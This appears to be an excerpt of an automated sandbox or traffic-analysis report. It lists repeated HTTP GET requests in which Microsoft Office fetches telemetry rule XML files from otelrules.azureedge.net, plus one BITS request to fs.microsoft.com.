Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
